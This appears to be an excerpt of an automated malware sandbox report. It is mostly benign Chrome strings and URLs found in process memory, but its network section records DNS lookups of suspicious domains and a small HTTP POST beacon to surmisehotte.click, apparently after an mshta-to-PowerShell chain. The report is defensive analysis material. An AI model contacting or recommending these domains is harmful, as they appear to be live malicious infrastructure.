rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#doodle{position:relative}#shareButton{background-color:var(--color-new-tab-page-doodle-share-button-background,none);border:none;height:32px;min-width:32px;padding:0;position:absolute;width:32px;bottom:0}:host-context([dir=ltr]) #shareButton{right:-40px}:host-context([dir=rtl]) #shareButton{left:-40px}#shareButtonIcon{width:18px;height:18px;margin:7px;vertical-align:bottom;mask-image:url(chro
Source: chrome.exe, 00000009.00000003.57225858403.0000781C03780000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57226031394.0000781C02418000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends CrLitElement{constructor(){super(...arguments);this.url={url:""}}static get is(){return"ntp-doodle-share-dialog"}static get styles(){return getCss$1()}render(){return getHtml$1.bind(this)()}static get properties(){return{title:{type:String},url:{type:Object}}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.fire("share",channel)}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);let instance$2=null;function getCss(){return instance$2\|\|(instance$2=[...[getCss$3()],css`:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#doodle{position:relative}#shareButton{background-color:var(--color-new-tab-page-doodle-share-button-background,none);border:none;height:32px;min-width:32px;padding:0;position:absolute;width:32px;bottom:0}:host-context([dir=ltr]) #shareButton{right:-40px}:host-context([dir=rtl]) #shareButton{left:-40px}#shareButtonIcon{width:18px;height:18px;margin:7px;vertical-align:bottom;mask-image:url(chro
Source: chrome.exe, 00000009.00000002.57296352145.0000781C033D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57298227177.0000781C035C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: chrome.exe, 00000009.00000002.57289715694.0000781C02A5B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/: equals www.youtube.com (Youtube)
Source: chrome.exe, 00000009.00000002.57296352145.0000781C033D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57298227177.0000781C035C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57298288513.0000781C035D8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
Source: chrome.exe, 00000009.00000002.57289715694.0000781C02A5B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/J equals www.youtube.com (Youtube)
Source: chrome.exe, 00000009.00000002.57301333788.0000781C03AA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57300752862.0000781C03994000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57297973142.0000781C03568000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
Source: chrome.exe, 00000009.00000002.57300752862.0000781C03994000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.htmlult equals www.youtube.com (Youtube)
Source: chrome.exe, 00000009.00000002.57298288513.0000781C035D8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: www.youtube.com:443 equals www.youtube.com (Youtube)

Source: global traffic	DNS traffic detected: DNS query: savecoupons.shop
Source: global traffic	DNS traffic detected: DNS query: journal.liveview.pw
Source: global traffic	DNS traffic detected: DNS query: surmisehotte.click
Source: global traffic	DNS traffic detected: DNS query: www.google.com

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: surmisehotte.click

Source: global traffic	TCP traffic: 192.168.11.20:61507 -> 239.255.255.250:1900
Source: global traffic	TCP traffic: 192.168.11.20:61507 -> 239.255.255.250:1900
Source: global traffic	TCP traffic: 192.168.11.20:61507 -> 239.255.255.250:1900
Source: global traffic	TCP traffic: 192.168.11.20:61507 -> 239.255.255.250:1900

Source: chrome.exe, 00000009.00000002.57295156049.0000781C03230000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57220737464.0000781C02CA0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/1423136
Source: chrome.exe, 00000009.00000002.57295156049.0000781C03230000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57220737464.0000781C02CA0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/40096371
Source: chrome.exe, 00000009.00000002.57295156049.0000781C03230000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57220737464.0000781C02CA0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/40096608
Source: chrome.exe, 00000009.00000002.57295156049.0000781C03230000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57220737464.0000781C02CA0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/40096838
Source: chrome.exe, 00000009.00000002.57295156049.0000781C03230000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57220737464.0000781C02CA0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/40644627
Source: chrome.exe, 00000009.00000002.57295156049.0000781C03230000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57220737464.0000781C02CA0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/40644912
Source: chrome.exe, 00000009.00000002.57295156049.0000781C03230000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57220737464.0000781C02CA0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/41488637
Source: chrome.exe, 00000009.00000002.57295156049.0000781C03230000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57220737464.0000781C02CA0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/42261924
Source: chrome.exe, 00000009.00000002.57295156049.0000781C03230000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57220737464.0000781C02CA0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/42263580
Source: chrome.exe, 00000009.00000002.57295156049.0000781C03230000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57220737464.0000781C02CA0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/42264193
Source: chrome.exe, 00000009.00000002.57295156049.0000781C03230000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57220737464.0000781C02CA0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/42264287
Source: chrome.exe, 00000009.00000002.57295156049.0000781C03230000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57220737464.0000781C02CA0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/42264571
Source: chrome.exe, 00000009.00000002.57295156049.0000781C03230000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57220737464.0000781C02CA0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/42265509
Source: chrome.exe, 00000009.00000002.57295156049.0000781C03230000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57220737464.0000781C02CA0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/42266194
Source: chrome.exe, 00000009.00000002.57295156049.0000781C03230000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57220737464.0000781C02CA0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/42266231
Source: chrome.exe, 00000009.00000002.57295156049.0000781C03230000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57220737464.0000781C02CA0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/42266232
Source: chrome.exe, 00000009.00000002.57295156049.0000781C03230000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57220737464.0000781C02CA0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/42266842
Source: chrome.exe, 00000009.00000002.57286920782.0000781C02470000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://clients2.google.com/time/1/current
Source: chrome.exe, 00000009.00000002.57291343797.0000781C02C64000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://clientservices.googleapis.com/chrome-variations/seed?osname=win&channel=stable&milestone=128
Source: chrome.exe, 00000009.00000003.57220737464.0000781C02CA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57294691129.0000781C031A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crbug.com/941620
Source: mshta.exe, 00000002.00000003.56246777435.00000000031DD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.56249723145.00000000031DE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.56232080477.00000000031DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.56231710859.00000000031D0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.56215345271.0000000000650000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.57160001365.0000000000880000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.57431193652.0000000000629000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: chrome.exe, 00000009.00000002.57294769307.0000781C031CC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: chrome.exe, 00000009.00000002.57294769307.0000781C031CC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: mshta.exe, 00000002.00000003.56246777435.00000000031DD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.56249723145.00000000031DE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.56232080477.00000000031DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.56231710859.00000000031D0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.56215345271.0000000000650000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.57160001365.0000000000880000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.57431193652.0000000000629000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: chrome.exe, 00000009.00000002.57289091865.0000781C02978000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57285755859.0000781C022DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57286086306.0000781C0233C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://developer.chrome.com/docs/extensions/how-to/distribute/install-extensions)
Source: chrome.exe, 00000009.00000002.57298031858.0000781C03578000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://dns-tunnel-check.googlezip.net/connect
Source: chrome.exe, 00000009.00000002.57285322841.0000781C0227D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://google.com/
Source: powershell.exe, 00000003.00000002.56221594211.000000000583E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.57163217722.0000000005AEF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: chrome.exe, 00000009.00000002.57294769307.0000781C031CC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: chrome.exe, 00000009.00000002.57294769307.0000781C031CC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: powershell.exe, 00000003.00000002.56217685265.000000000492B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.56223425893.0000000006D8E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.57163217722.0000000004BD8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000003.00000002.56217685265.000000000492B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.57163217722.0000000004BD8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png4
Source: chrome.exe, 00000009.00000003.57229158279.0000781C02710000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57229611994.0000781C039C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57229782396.0000781C02804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57227105780.0000781C03864000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57227297827.0000781C03890000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57229474334.0000781C02744000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57227507330.0000781C02744000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57227701272.0000781C038BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://polymer.github.io/AUTHORS.txt
Source: chrome.exe, 00000009.00000003.57229158279.0000781C02710000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57229611994.0000781C039C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57229782396.0000781C02804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57227105780.0000781C03864000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57227297827.0000781C03890000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57229474334.0000781C02744000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57227507330.0000781C02744000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57227701272.0000781C038BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://polymer.github.io/CONTRIBUTORS.txt
Source: chrome.exe, 00000009.00000003.57229158279.0000781C02710000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57229611994.0000781C039C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57229782396.0000781C02804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57227105780.0000781C03864000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57227297827.0000781C03890000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57229474334.0000781C02744000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57227507330.0000781C02744000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57227701272.0000781C038BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://polymer.github.io/LICENSE.txt
Source: chrome.exe, 00000009.00000003.57229158279.0000781C02710000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57229611994.0000781C039C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57229782396.0000781C02804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57227105780.0000781C03864000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57227297827.0000781C03890000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57229474334.0000781C02744000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57227507330.0000781C02744000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57227701272.0000781C038BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://polymer.github.io/PATENTS.txt
Source: chrome.exe, 00000009.00000002.57298407737.0000781C03604000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://redirector.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvNzI0QUFXNV9zT2RvdUw
Source: powershell.exe, 00000003.00000002.56217685265.00000000047D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.57163217722.0000000004A81000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: chrome.exe, 00000009.00000002.57294769307.0000781C031CC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: chrome.exe, 00000009.00000002.57293456384.0000781C02FC8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://unisolated.invalid/
Source: powershell.exe, 00000003.00000002.56217685265.000000000492B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.56223425893.0000000006D8E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.57163217722.0000000004BD8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000003.00000002.56217685265.000000000492B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.57163217722.0000000004BD8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html4
Source: chrome.exe, 00000009.00000002.57293813222.0000781C03040000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.gstatic.com/generate_204
Source: mshta.exe, 00000002.00000003.56246777435.00000000031DD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.56249723145.00000000031DE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.56232080477.00000000031DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.56231710859.00000000031D0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.56215345271.0000000000650000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.57160001365.0000000000880000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.57431193652.0000000000629000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.quovadis.bm0
Source: chrome.exe, 00000009.00000002.57291222045.0000781C02C59000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296155580.0000781C03390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57223510159.0000781C02CB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57299517760.0000781C03710000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;dc_pre=CL6sqZyWpIgDFWU-RAgdUQci9A;src=2542116;type=cli
Source: chrome.exe, 00000009.00000002.57292172189.0000781C02DB4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: chrome.exe, 00000009.00000002.57296924837.0000781C03470000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://account.live.com/Abuse?mkt=EN-US&uiflavor=web&client_id=1E000040382627&id=293577&lmif=40&abr
Source: chrome.exe, 00000009.00000002.57285322841.0000781C02254000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accountcapabilities-pa.googleapis.com/v1/accountcapabilities:batchGet
Source: chrome.exe, 00000009.00000002.57300803464.0000781C039AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57288885941.0000781C02928000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com
Source: chrome.exe, 00000009.00000002.57287094746.0000781C02524000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57300803464.0000781C039AC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/
Source: chrome.exe, 00000009.00000002.57286920782.0000781C02470000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/GetCheckConnectionInfo
Source: chrome.exe, 00000009.00000002.57286920782.0000781C02470000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/ListAccounts?json=standard
Source: chrome.exe, 00000009.00000002.57286920782.0000781C02470000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/embedded/reauth/chromeos
Source: chrome.exe, 00000009.00000002.57286920782.0000781C02470000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/embedded/setup/chrome/usermenu
Source: chrome.exe, 00000009.00000002.57286920782.0000781C02470000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/embedded/setup/kidsignin/chromeos
Source: chrome.exe, 00000009.00000002.57286920782.0000781C02470000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/embedded/setup/kidsignup/chromeos
Source: chrome.exe, 00000009.00000002.57286920782.0000781C02470000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/embedded/setup/v2/chromeos
Source: chrome.exe, 00000009.00000002.57286920782.0000781C02470000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/embedded/setup/windows
Source: chrome.exe, 00000009.00000002.57286920782.0000781C02470000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/embedded/xreauth/chrome
Source: chrome.exe, 00000009.00000002.57286920782.0000781C02470000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/encryption/unlock/desktop
Source: chrome.exe, 00000009.00000002.57285582693.0000781C022B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/encryption/unlock/desktop?kdi=CAIaDgoKY2hyb21lc3luYxAB
Source: chrome.exe, 00000009.00000003.57223806168.0000781C032B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57286859172.0000781C02454000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/o/oauth2/revoke
Source: chrome.exe, 00000009.00000003.57223806168.0000781C032B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57286859172.0000781C02454000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/oauth/multilogin
Source: chrome.exe, 00000009.00000002.57286920782.0000781C02470000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/signin/chrome/sync?ssp=1
Source: chrome.exe, 00000009.00000002.57284172765.0000781800698000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aida.googleapis.com/v1/aida:doConversation
Source: chrome.exe, 00000009.00000003.57253214712.00007818006CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57249143284.0000781C03C04000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aida.googleapis.com/v1/aida:doConversation2
Source: powershell.exe, 00000003.00000002.56217685265.00000000047D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.57163217722.0000000004A81000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: chrome.exe, 00000009.00000002.57296978805.0000781C0347C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.office.com/office/url/setup
Source: chrome.exe, 00000009.00000002.57296155580.0000781C03390000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://alldrivers4devices.net/
Source: chrome.exe, 00000009.00000002.57295156049.0000781C03230000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57220737464.0000781C02CA0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/42265720
Source: chrome.exe, 00000009.00000002.57287949667.0000781C02681000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://apis.google.com
Source: chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://beastacademy.com/checkout/cart
Source: chrome.exe, 00000009.00000002.57291147836.0000781C02C04000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://blog.google/products/chrome/google-chrome-safe-browsing-real-time/
Source: chrome.exe, 00000009.00000002.57295715512.0000781C0331A000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296679149.0000781C03438000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57300237357.0000781C03824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57294836975.0000781C031DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://c2rsetup.officeapps.live.com/c2r/download.aspx?productReleaseID=HomeBusiness2019Retail&platf
Source: chrome.exe, 00000009.00000003.57229158279.0000781C02710000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57229611994.0000781C039C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57229782396.0000781C02804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57229474334.0000781C02744000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://calendar.google.com
Source: chrome.exe, 00000009.00000002.57292744916.0000781C02E90000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57292172189.0000781C02DB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57288715813.0000781C02898000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://calendar.google.com/calendar/u/0/r/eventedit?usp=chrome_actions
Source: chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cart.godaddy.com/go/checkout
Source: chrome.exe, 00000009.00000002.57293456384.0000781C02FC8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.ico
Source: chrome.exe, 00000009.00000002.57291415985.0000781C02C84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57291222045.0000781C02C59000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57295545247.0000781C032E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57287280575.0000781C02568000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.stubdownloader.services.mozilla.com/builds/firefox-latest-ssl/en-GB/win64/b5110ff5d41570
